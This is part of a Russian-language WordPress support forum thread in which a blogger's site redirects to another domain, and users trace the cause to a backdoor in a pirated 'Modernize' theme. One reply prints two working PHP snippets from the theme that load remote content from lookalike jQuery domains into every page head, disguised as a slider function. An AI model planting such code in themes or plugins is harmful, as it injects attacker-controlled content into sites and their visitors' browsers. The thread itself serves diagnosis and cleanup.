• Давно не залазил на свой блог, а тут решил зайти и обнаружил что не могу попасть не на какие страницы, т.к. перенаправляет на адрес www1.wickedblog.ru, смотрел .htaccess, вроде ничего нет такого, что могло бы взвать интерес, смотрел wp-config и wp-settings, смотрел шаблон, который активен, ничего с этим связанного не нашел, вроде все чисто, что это может быть? Где искать проблему?

Просмотр 9 ответов — с 16 по 24 (всего 24)
  • для чего им это надо?

    Ну, как минимум, попасть в топ новостей — массовый взлом сайтов :))) А если честно, то я не вникаю в их логику.

    У меня таже проблеммма тема Modernize, где брал не помню. Тему могу скинуть…

    тема Modernize, где брал не помню

    Сто тыщ миллионов раз говорили — не берите Темы с помоек..
    bogom, на пастебине (выше ссылка) участок кода, поищите его у себя в файлах Темы (может быть и зашифрован)

    нашёл только: <?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>

    А вот вроде то: <?php if (!function_exists('insert_jquery_des')){function insert_jquery_des(){if (function_exists('curl_init')){$url = "http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_des');} ?>

    Было найдено в modernize\include\plugin\post.php
    при чём в теме которую я ставил с нуля, те вирус был изначально…
    Тогда почему сайт примерно месяц проработал нормально?

    wikicms, спасибо большое, сайт заработал :))

    Модератор Юрий

    (@yube)

    Тогда почему сайт примерно месяц проработал нормально?

    Потому что это «управляемый вирус». Во-первых, злоумышленникам есть смысл выждать — обычно через две-три недели после старта сайта или серьезной переделки (той же смены темы) админы расслабляются и перестают разглядывать под микроскопом свой сайт, то есть, со временем вероятность обнаружения закладки сильно падает. Во-вторых, те, кто контролирует такие закладки, чаще всего работают за деньги, и пока нет заказа, закладка молча ждет своего часа.

    Модератор Sergey Biryukov

    (@sergeybiryukov)

    Live and Learn

    странный редирект сам по себе, на нейкий jqueryC.com

    Похожие темы:

Просмотр 9 ответов — с 16 по 24 (всего 24)
  • Тема «Блог взломан?» закрыта для новых ответов.